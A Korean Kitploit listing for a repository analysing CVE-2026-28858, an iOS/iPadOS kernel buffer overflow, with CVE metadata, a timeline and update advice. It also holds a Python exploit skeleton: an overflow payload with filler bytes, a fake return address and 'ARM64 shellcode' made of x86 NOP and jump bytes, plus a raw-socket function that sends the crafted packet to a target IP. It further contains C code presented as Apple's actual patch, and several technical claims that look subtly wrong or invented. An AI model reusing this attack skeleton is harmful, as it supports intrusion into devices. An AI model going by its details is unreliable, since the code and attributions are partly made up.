Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-28858 — CVE-2026-28858에 대한 기술 분석: Apple iOS/iPadOS 커널의 치명적인 버퍼 오버플로우로, 익스플로잇 흐름, 완화 조치, 방어적 코딩 예제를 포함합니다. | Kitploit
도구/GitHubGitHub/kaleth4/cve-2026-28858
iOS SecurityVulnerability AnalysisExploitationMobile SecurityLearning & EducationBinary Exploitation
GitHubkaleth4/cve-2026-28858

CVE-2026-28858

CVE-2026-28858에 대한 기술 분석: Apple iOS/iPadOS 커널의 치명적인 버퍼 오버플로우로, 익스플로잇 흐름, 완화 조치, 방어적 코딩 예제를 포함합니다.

저장소 보기
4개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

⚠️ CVE-2026-28858 — Apple iOS/iPadOS 버퍼 오버플로우

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  심각도: 치명적  │  CVSS: 9.8  │  CWE-120  │  원격   ║
╚══════════════════════════════════════════════════════════════╝

원격 사용자는 사용자 상호작용이나 권한 없이 iOS/iPadOS에서 시스템의 예기치 않은 종료 또는 커널 메모리 손상을 유발할 수 있습니다.


📋 기술 정보

필드값
CVE IDCVE-2026-28858
EUVDEUVD-2026-15131
게시일2026년 3월 25일
최종 업데이트2026년 3월 26일
CVSS v3.19.8 / 10 — 치명적
EPSS0.05%
벡터CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-120 — 크기 확인 없는 버퍼 복사
상태분석 완료 — 패치 사용 가능

🎯 설명

Apple iOS 및 iPadOS의 커널 입력 처리 시 경계 검사가 불충분하여 발생하는 버퍼 오버플로우(Buffer Overflow)입니다.

실제 영향:

  • 서비스 거부(시스템 충돌)
  • 커널 메모리 손상
  • 커널 권한으로 임의 코드 실행 가능성
  • 제로클릭: 사용자 상호작용 불필요

⚡ 공격 벡터 세부 정보


🔬 기술 분석 및 코드 예시

CVE-2026-28858에 대한 공개 익스플로잇은 존재하지 않습니다. 다음 표현은 CWE-120 및 문서화된 공격 벡터를 기반으로 한 개념적 표현입니다.

1. 페이로드 구조 (오버플로우)

root@kitploit:~
# 오버플로우의 개념적 표현
import socket

# 1. 할당된 버퍼 채우기 (커널 핸들러에서 일반적으로 ~512바이트)
buffer_fill = b"A" * 512

# 2. 덮어쓴 반환 주소 — 공격자가 제어하는 영역을 가리킴
# 실제 iOS/iPadOS: ASLR + PAC(Pointer Authentication Codes) 우회 필요
return_address = b"\x41\x42\x43\x44"

# 3. 셸코드: NOP 슬레드 + ARM64용 악성 명령어
shellcode = b"\x90" * 16 + b"\xeb\x12..."  # NOP 슬레드 + 페이로드

payload = buffer_fill + return_address + shellcode

2. 전달 벡터 (제로클릭)

root@kitploit:~
# 사용자 상호작용 없는 원격 전달
# 예: 조작된 길이 필드가 있는 네트워크 패킷

import struct

def craft_malicious_packet(target_ip: str, target_port: int):
    """
    iOS 커널이 백그라운드에서 처리하는(사용자 UI 없이)
    잘못된 형식의 메타데이터가 포함된 패킷을 생성합니다.
    예: TLS 인증서, 이미지 메타데이터, 네트워크 프로토콜 필드.
    """
    # 프로토콜의 정상 헤더
    header = struct.pack(">HH", 0x0001, 0xFFFF)  # type=1, length=OVERFLOW

    # 커널 버퍼를 초과하는 페이로드
    malicious_data = header + payload

    with socket.socket(socket.AF_INET, socket.SOCK_RAW) as s:
        s.sendto(malicious_data, (target_ip, target_port))

3. 커널에서의 실행 (익스플로잇 흐름)

root@kitploit:~
[네트워크/WiFi/BT] → 잘못된 형식의 패킷
      ↓
[백그라운드 iOS 프로세스] → "길이" 필드 읽기 = 0xFFFF
      ↓
[memcpy(커널_버퍼, 데이터, 0xFFFF)] → 경계 검사 없음
      ↓
[오버플로우: 셸코드가 커널 스택/힙에 기록됨]
      ↓
[프로세서가 공격자의 return_address로 리디렉션됨]
      ↓
[ring 0 / 커널 권한으로 실행]

4. 취약한 코드 vs. 수정된 코드

root@kitploit:~
/* ❌ 취약한 코드 (패치 이전) */
void procesar_entrada(char *datos_usuario, size_t longitud) {
    char bufer_kernel[512];
    memcpy(bufer_kernel, datos_usuario, longitud); // 검증 없음
}

/* ✅ 수정된 코드 (iOS/iPadOS 26.4) */
void procesar_entrada(char *datos_usuario, size_t longitud) {
    char bufer_kernel[512];

    // 경계 검사 — Apple이 적용한 수정
    if (longitud > sizeof(bufer_kernel)) {
        kernel_log("CVE-2026-28858: 입력 잘림 [%zu > 512]", longitud);
        return; // 복사 전에 중단
    }

    memcpy(bufer_kernel, datos_usuario, longitud);
}

5. 스택 카나리로 탐지

root@kitploit:~
/* 심층 방어 메커니즘: 스택 카나리 */
#include <string.h>

#define CANARY_VALUE 0xDEADBEEFCAFEBABE

void procesar_entrada_segura(char *datos_usuario, size_t longitud) {
    uint64_t canary = CANARY_VALUE;
    char bufer_seguro[512];

    if (longitud > sizeof(bufer_seguro)) {
        log_security_event("오버플로우 시도 차단됨");
        return;
    }

    memcpy(bufer_seguro, datos_usuario, longitud);

    // 복사 후 카나리 무결성 확인
    if (canary != CANARY_VALUE) {
        panic("스택 스매싱 감지 — CVE-2026-28858");
    }
}

🛡️ 완화 조치

즉시 필요한 조치:

root@kitploit:~
iOS 26.4 / iPadOS 26.4 이상으로 업데이트
  • 설정 → 일반 → 소프트웨어 업데이트
  • 26.4 이전 버전의 모든 Apple 기기에 적용
  • 실행 가능한 해결 방법 없음 — 패치만이 효과적

📅 타임라인

root@kitploit:~
2026년 3월 23일  → 최초 게시 (EUVD)
2026년 3월 24일  → Apple 권고 #126792 게시
2026년 3월 24일  → 최초 언급 감지 (Feedly)
2026년 3월 24일  → 자동 분석을 통한 CVSS 추정
2026년 3월 25일  → NVD가 CVSS 9.8 — 치명적 지정
2026년 3월 25일  → Qualys 탐지 추가 (ID: 610773)
2026년 3월 26일  → 상태: 분석 완료

🖥️ 영향을 받는 시스템

26.4 이전의 모든 iOS 및 iPadOS 버전, 다음을 포함:

  • iOS 1.0 → 26.3.x
  • iPadOS 12.1 → 26.3.x

영향을 받는 전체 CPE 목록은 참조 문서를 확인하세요.


🔗 참조

출처URL
Apple 보안 권고https://support.apple.com/en-us/126792
NVDhttps://nvd.nist.gov/vuln/detail/CVE-2026-28858
CWE-120https://cwe.mitre.org/data/definitions/120.html

⚠️ 관련 CAPEC 분류

  • CAPEC-100 — 버퍼 오버플로우
  • CAPEC-10 — 환경 변수를 통한 오버플로우
  • CAPEC-14 — 클라이언트 측 주입으로 유발된 버퍼 오버플로우
  • CAPEC-8 — API 호출의 버퍼 오버플로우
  • CAPEC-92 — 강제 정수 오버플로우

면책 조항: 제시된 코드는 교육 및 방어적 연구 목적의 개념적 표현일 뿐입니다. CVE-2026-28858에 대한 공개 익스플로잇은 존재하지 않습니다.

도구 다운로드
매개변수값설명
공격 벡터네트워크원격으로 악용 가능
복잡성낮음특별한 조건 없음
필요한 권한없음인증 불필요
사용자 상호작용없음제로클릭
범위변경 없음취약한 구성 요소에 국한
기밀성높음데이터 전체 접근
무결성높음전체 수정 가능
가용성높음시스템 충돌